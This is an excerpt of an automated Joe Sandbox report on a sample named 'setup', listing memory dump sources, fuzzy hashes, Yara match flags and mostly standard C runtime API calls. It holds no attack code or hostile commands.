                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__call_reportfault__get_sys_err_msg__getptd_noexit__invoke_watson_raise_strcpy_s
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 1417603120-798102604
                • Opcode ID: 9f70c00b1387444281d67d95fce6b3c332b958c045866739d762a51525849dea
                • Instruction ID: 8a29dfca28fc1b4608df53a759f7606d4bc13e036d648c85fe0275d7da9ef403
                • Opcode Fuzzy Hash: 9f70c00b1387444281d67d95fce6b3c332b958c045866739d762a51525849dea
                • Instruction Fuzzy Hash: 4111E67164030867E720BA569C46B6B3799DB84728F14853FFA09BB7C3DB799E0082DD
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                • String ID:
                • API String ID: 65388428-0
                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction ID: 751a09ffa102a3642e32cf638a40ede047e82e4308d2e4465646e0851ae72850
                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction Fuzzy Hash: FB515BB1D40319ABDB11DBA5DC86FEFBBB9FF04704F100026F909B6180EB746A059BA5
                APIs
                • __CxxThrowException@8.LIBCMT ref: 004063C3
                  • Part of subcall function 00409248: RaiseException.KERNEL32(?,?,00409247,?,?,?,?,?,00409247,?,004185EC,0052833C), ref: 0040928A
                • __CxxThrowException@8.LIBCMT ref: 004063F2
                • __CxxThrowException@8.LIBCMT ref: 0040641F
                • __CxxThrowException@8.LIBCMT ref: 00406447
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: Exception@8Throw$ExceptionRaise
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 3476068407-1866435925
                • Opcode ID: dcebe720d9a318b5fd43747065a873d1d6fac4c5ce60c65a612453d25b3251df
                • Instruction ID: 67f8a41c4051d41f5e92d64c5ed2fe81d4494d19a488f0c74c05dec37bcb4b30
                • Opcode Fuzzy Hash: dcebe720d9a318b5fd43747065a873d1d6fac4c5ce60c65a612453d25b3251df
                • Instruction Fuzzy Hash: 02018E751143007EC204EB21CC53FAF7398AB80704F808C2EB946A60C2EB7CE918C66E
                APIs
                • __getptd.LIBCMT ref: 0040FE99
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __amsg_exit.LIBCMT ref: 0040FEB9
                • __lock.LIBCMT ref: 0040FEC9
                • InterlockedDecrement.KERNEL32(?), ref: 0040FEE6
                • _free.LIBCMT ref: 0040FEF9
                • InterlockedIncrement.KERNEL32(01F216D8), ref: 0040FF11
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID: "v`"v
                • API String ID: 3470314060-2422224426
                • Opcode ID: a7bd57b583e21d6a8ac2e9e883a3bd6fa43c1597edd5ae3d936e182c3787d4ae
                • Instruction ID: ea0bfd038d8f398dde78786cd25fa227568cef715600d59ca9d9c8a76ca3a570
                • Opcode Fuzzy Hash: a7bd57b583e21d6a8ac2e9e883a3bd6fa43c1597edd5ae3d936e182c3787d4ae
                • Instruction Fuzzy Hash: B2018E32D00622EBC731ABA5D84679A76A0BF41714F14023BE804B3AE1CB3C5845DBDD
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00418CD8,00000008,0040C756,00000000,00000000,?,00409A0C,?,00000001), ref: 0040C65F
                • __lock.LIBCMT ref: 0040C693
                  • Part of subcall function 004120A6: __mtinitlocknum.LIBCMT ref: 004120BC
                  • Part of subcall function 004120A6: __amsg_exit.LIBCMT ref: 004120C8
                  • Part of subcall function 004120A6: EnterCriticalSection.KERNEL32(00409A0C,00409A0C,?,0040C698,0000000D), ref: 004120D0
                • InterlockedIncrement.KERNEL32(10E8F04D), ref: 0040C6A0
                • __lock.LIBCMT ref: 0040C6B4
                • ___addlocaleref.LIBCMT ref: 0040C6D2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: KERNEL32.DLL$"v`"v
                • API String ID: 637971194-3491716274
                • Opcode ID: 67cc218f8e90605de5e1fedb1a4f22bc942fa97acf823e52836c7a5268b584dc
                • Instruction ID: b768362c678b05ce65ffaab9d395ea4738b797b09decd87b9107d553bdcfe6ce
                • Opcode Fuzzy Hash: 67cc218f8e90605de5e1fedb1a4f22bc942fa97acf823e52836c7a5268b584dc
                • Instruction Fuzzy Hash: 8901A171401700DFD720AFA6C94574ABBF0BF50314F108A1FE499A73E1CBB8A584CB59
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 6c219564e4e5b54eee21f8006061addf31548949c8194e44ea8ee8739f12e41c
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: 3F515FB1E40309EBDF11DFA1DC86FEEBBB9EB04704F104029F905B6580D7B5AA059BA5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: b69b66390ee396732530aefc4bd9c968a43b3d8717302f9e7e9bdc700805f68e
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: EA515171D40309ABDF21DFA1DC46FEEBBB9FB04704F104129FA05B6580EB74AA059BA4
                APIs
                • __getptd.LIBCMT ref: 0040B9A0
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __getptd.LIBCMT ref: 0040B9B1
                • __getptd.LIBCMT ref: 0040B9BF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: MOC$RCC$csm
                • API String ID: 803148776-2671469338
                • Opcode ID: d95cf18587199c074f1e4e6091dd9227b760f2886ea5cd7bbc55ef2bd5d6f2a6
                • Instruction ID: 51486afd0df8b4695865c98f1778c62a9337f5a5582a88292d8df86027a5db24
                • Opcode Fuzzy Hash: d95cf18587199c074f1e4e6091dd9227b760f2886ea5cd7bbc55ef2bd5d6f2a6
                • Instruction Fuzzy Hash: B4E0EDB012410C8FC710A765C18AF693294EF49318F1506B7A50CE72A2C73C98508ACA
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                • String ID:
                • API String ID: 3534693527-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 467f50ca4addbfbe28ceaed18296fcf567468c52e97481c5930a5b33f156d8ac
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: 7631E172A01335AFEB636B689C00BEF6BA99F05B64F114415ED04EB284DB748940EAA5
                APIs
                • __getptd_noexit.LIBCMT ref: 020D66DD
                  • Part of subcall function 020359BF: __calloc_crt.LIBCMT ref: 020359E2
                  • Part of subcall function 020359BF: __initptd.LIBCMT ref: 02035A04
                • __calloc_crt.LIBCMT ref: 020D6700
                • __get_sys_err_msg.LIBCMT ref: 020D671E
                • __invoke_watson.LIBCMT ref: 020D673B
                • __get_sys_err_msg.LIBCMT ref: 020D676D
                • __invoke_watson.LIBCMT ref: 020D678B
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                • String ID:
                • API String ID: 4066021419-0
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: e9299049b1ab6de85892f8e785e919585a00dfcc4789869d15f1927fc9007859
                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: DA11C4356027186BEB637A25AC40BEF77DDDF05764F000426FD08EA240E727D9006AE4
                APIs
                • __CreateFrameInfo.LIBCMT ref: 0040BC59
                  • Part of subcall function 004090C3: __getptd.LIBCMT ref: 004090D1
                  • Part of subcall function 004090C3: __getptd.LIBCMT ref: 004090DF
                • __getptd.LIBCMT ref: 0040BC63
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __getptd.LIBCMT ref: 0040BC71
                • __getptd.LIBCMT ref: 0040BC7F
                • __getptd.LIBCMT ref: 0040BC8A
                • _CallCatchBlock2.LIBCMT ref: 0040BCB0
                  • Part of subcall function 00409168: __CallSettingFrame@12.LIBCMT ref: 004091B4
                  • Part of subcall function 0040BD57: __getptd.LIBCMT ref: 0040BD66
                  • Part of subcall function 0040BD57: __getptd.LIBCMT ref: 0040BD74
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: 31827d3d99e948d9a99a61204dfdd885f97f422d913b0096321dd7dd958519e5
                • Instruction ID: ff16f79eb663340c76d80c0268cb68fc8c1910eb21981e23cbfd897c3033905b
                • Opcode Fuzzy Hash: 31827d3d99e948d9a99a61204dfdd885f97f422d913b0096321dd7dd958519e5
                • Instruction Fuzzy Hash: 7A11DAB5D00209DFDB00EFA5C485ADEB7B0FF04314F10816AF815A7292DB389A159F58
                APIs
                • ___BuildCatchObject.LIBCMT ref: 0040BFF1
                  • Part of subcall function 0040BF4C: ___BuildCatchObjectHelper.LIBCMT ref: 0040BF82
                • _UnwindNestedFrames.LIBCMT ref: 0040C008
                • ___FrameUnwindToState.LIBCMT ref: 0040C016
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                • String ID: csm$csm
                • API String ID: 2163707966-3733052814
                • Opcode ID: b8fa8ff8d99caff4ab9ba5b96f38fb8ed5015abb4b7a7a5e9efffb87fed2daef
                • Instruction ID: e3d0a9e8064a7505e1b410320f65b9c0aeab2ebf74c7c542e98ec29b955c8f78
                • Opcode Fuzzy Hash: b8fa8ff8d99caff4ab9ba5b96f38fb8ed5015abb4b7a7a5e9efffb87fed2daef
                • Instruction Fuzzy Hash: 9801287100010AFBDF226F52CC45EAB3E6AFF04344F14412ABD48651A1DB3AD871EBE8
                APIs
                • _malloc.LIBCMT ref: 004091E2
                  • Part of subcall function 0040934C: __FF_MSGBANNER.LIBCMT ref: 00409365
                  • Part of subcall function 0040934C: __NMSG_WRITE.LIBCMT ref: 0040936C
                  • Part of subcall function 0040934C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0040A0EE,00409A0C,00000001,00409A0C,?,00412031,00000018,00418DE8,0000000C,004120C1), ref: 00409391
                • std::exception::exception.LIBCMT ref: 00409217
                • std::exception::exception.LIBCMT ref: 00409231
                • __CxxThrowException@8.LIBCMT ref: 00409242
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                • String ID: bad allocation
                • API String ID: 1414122017-2104205924
                • Opcode ID: b4a94c6ebf1a3133feba4a1f6ff9f590ddc215d4c5779bd997423df818d684e9
                • Instruction ID: 67a5e63f996d886ebf1624c4bf591a6a96beae6ddf9fd96746d291f21c60ecc3
                • Opcode Fuzzy Hash: b4a94c6ebf1a3133feba4a1f6ff9f590ddc215d4c5779bd997423df818d684e9
                • Instruction Fuzzy Hash: A0F0F97150020566DF14F795DC46AAE3AB55F50B04F14083FE801B62E2CF788E469649
                APIs
                • _malloc.LIBCMT ref: 004092AD
                  • Part of subcall function 0040934C: __FF_MSGBANNER.LIBCMT ref: 00409365
                  • Part of subcall function 0040934C: __NMSG_WRITE.LIBCMT ref: 0040936C
                  • Part of subcall function 0040934C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0040A0EE,00409A0C,00000001,00409A0C,?,00412031,00000018,00418DE8,0000000C,004120C1), ref: 00409391
                • _free.LIBCMT ref: 004092C0
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: AllocHeap_free_malloc
                • String ID:
                • API String ID: 2734353464-0
                • Opcode ID: d6153298086588fc4a1cfb45786697eabffaa3bf0c1d10b8c6e349a9b5b2ccc3
                • Instruction ID: 00fb54e0d6e6f7d97a281707232910f34a2afd22c9c70b3c4bda47d21053d458
                • Opcode Fuzzy Hash: d6153298086588fc4a1cfb45786697eabffaa3bf0c1d10b8c6e349a9b5b2ccc3
                • Instruction Fuzzy Hash: 0A119872401515EBCB213B75AC05A9A36A89F943A4B20853FFC45FA2F2DB3C8C419A9C
                APIs
                • __getptd.LIBCMT ref: 0041061A
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __getptd.LIBCMT ref: 00410631
                • __amsg_exit.LIBCMT ref: 0041063F
                • __lock.LIBCMT ref: 0041064F
                • __updatetlocinfoEx_nolock.LIBCMT ref: 00410663
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: ce91fedbc6c1533011ab1e51e18f3be8b6d7702f30d9236eab961568829d2e60
                • Instruction ID: 8ac645b88e2dd6a322ab5944c51c959f4918b763dc00cf9017fabeed402b29c2
                • Opcode Fuzzy Hash: ce91fedbc6c1533011ab1e51e18f3be8b6d7702f30d9236eab961568829d2e60
                • Instruction Fuzzy Hash: 71F09631D41710DBD720BBA5D847B8A36D06F41728F10421FF404A72D2CBBC59D19E5E
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: D
                • API String ID: 2102423945-2746444292
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: 200c29ea114eba1f8271fb8b3272ba418a89ed5b28ce38f1283c9747abf6871b
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: B6E15D71D00329AECF65DBE0CD49FEEB7B8BF04304F14406AE909A6190EB749A49DF54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: $$$(
                • API String ID: 2102423945-3551151888
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: 62121d7cf457ad080f5213234dea1e26d96954358fe2ef6182a01bdc4f09a10b
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: C0919E71D00358EAEF21CFA4C889BEEBBB5AF05308F144169D506772C0DBB65A48DF65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: b896ef5999ad83d60411fcb2befcc70b2700af6e490bf18111e1fa0f740be4ad
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: 79215B7220430C7EEB529AA49C45BFE77EDDB48350F904175F908CB1A0FB71EA009AA4
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00407661
                  • Part of subcall function 00404E30: std::_Lockit::_Lockit.LIBCPMT ref: 00404E3F
                • std::bad_exception::bad_exception.LIBCMT ref: 004076B8
                • __CxxThrowException@8.LIBCMT ref: 004076C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                • String ID: bad cast
                • API String ID: 2513498551-3145022300
                • Opcode ID: 3cbe71b3766487ce18d94ca85fddc6bfcc3a5855d5b5897b6b8b824fa36a65e7
                • Instruction ID: dc548ee90676d7fde275af7051f8754d731853e423fb1247d09d685a38f9a49c
                • Opcode Fuzzy Hash: 3cbe71b3766487ce18d94ca85fddc6bfcc3a5855d5b5897b6b8b824fa36a65e7
                • Instruction Fuzzy Hash: E511D371908710ABC210EB65D841B6FB7A4AB94778F504A3EF565633D1CF3C9805879A
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 004071B1
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040720A
                  • Part of subcall function 00404DD0: std::exception::exception.LIBCMT ref: 00404DD8
                • __CxxThrowException@8.LIBCMT ref: 00407203
                  • Part of subcall function 00409248: RaiseException.KERNEL32(?,?,00409247,?,?,?,?,?,00409247,?,004185EC,0052833C), ref: 0040928A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: std::_$ExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::exception
                • String ID: bad locale name
                • API String ID: 3240751772-1405518554
                • Opcode ID: d45845da433ca22ffc5e2e2b39c62ffe017800330f68b47fcd2a2e6b50f35698
                • Instruction ID: 2f997e07d1cbbf8b208aeb3d4ba948306f6691ddf2c04528aab1b6de1bf80412
                • Opcode Fuzzy Hash: d45845da433ca22ffc5e2e2b39c62ffe017800330f68b47fcd2a2e6b50f35698
                • Instruction Fuzzy Hash: E4017170544A00AED310EF15D846B9BB7E8EF60714F408A7FF05562AD2DB7CA909CB6A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 06cf9bb1733bcd93cd93a3dacdd62052172023b95748eb0442329af43caea019
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: B7F0ED78698750A5F7227750BC26B857E917B31B0CF104088E1182E2E1E3FD238CA79A
                APIs
                • std::exception::exception.LIBCMT ref: 0205FBF1
